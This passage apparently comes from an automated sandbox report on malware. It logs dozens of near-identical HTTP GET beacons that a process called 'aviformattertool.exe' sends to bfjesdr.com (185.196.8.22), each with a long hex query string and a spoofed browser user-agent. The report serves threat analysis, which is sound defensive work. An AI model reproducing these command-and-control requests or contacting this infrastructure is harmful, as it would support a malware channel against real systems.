                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        56192.168.2.449794185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:38.044367075 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:38.266396999 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:38 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        57192.168.2.449795185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:38.582840919 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:38.799787998 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:38 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        58192.168.2.449796185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:39.107883930 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:39.329850912 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:39 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        59192.168.2.449797185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:39.641729116 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:39.858006954 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:39 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        60192.168.2.449798185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:40.170829058 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:40.394274950 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:40 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        61192.168.2.449799185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:40.713318110 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:40.930108070 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:40 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        62192.168.2.449800185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:41.253204107 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:41.475627899 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:41 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:41.595482111 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:41.812356949 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:41 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        63192.168.2.449801185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:42.119170904 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:42.347152948 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:42 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        64192.168.2.449802185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:42.650336981 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:42.867069960 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:42 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:42.979331017 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:43.200664997 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:43 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        65192.168.2.449803185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:43.510046005 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:43.726180077 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:43 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:43.838408947 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:44.055813074 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:43 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        66192.168.2.449804185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:44.370754004 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:44.591407061 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:44 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        67192.168.2.449805185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:44.905829906 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:45.125348091 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:45 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        68192.168.2.449806185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:45.431524992 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:45.648302078 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:45 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        69192.168.2.449807185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:45.964760065 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:46.186628103 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:46 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        70192.168.2.449808185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:46.498207092 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:46.714344025 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:46 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:46.826745033 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:47.043061018 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:46 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        71192.168.2.449809185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:47.360348940 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:47.581254959 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:47 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        72192.168.2.449810185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:47.886632919 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:48.110296965 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:48 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        73192.168.2.449811185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:48.417948961 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:48.634325981 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:48 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
